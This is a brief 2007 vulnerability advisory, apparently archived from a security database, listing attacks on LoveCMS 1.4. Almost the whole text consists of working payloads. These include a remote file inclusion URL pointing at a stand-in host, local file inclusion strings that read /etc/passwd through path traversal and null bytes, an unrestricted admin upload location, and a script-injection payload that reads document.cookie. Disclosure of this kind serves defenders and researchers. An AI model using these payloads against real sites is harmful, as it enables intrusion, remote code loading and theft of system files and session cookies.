Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16148
HistoryFeb 22, 2007 - 12:00 a.m.

LoveCMS 1.4 multiple vulnerabilities

2007-02-2200:00:00
vulners.com
38

rfi:
/lovecms/install/index.php?step=http://site.com/boum.txt?

lfi:
/lovecms/install/index.php?step=/etc/passwd%00
/lovecms/?load=…/…/…/…/…/…/…/…/…/…/etc/passwd%00

admin upload vuln :
upload any kind of file even if it's not accepted it will be stored here :
/modules/content/pictures/tmp/

xss get via error sql:
/lovecms/?load=content&id='</textarea>'"><script>alert(document.cookie)</script>

laurent gaffie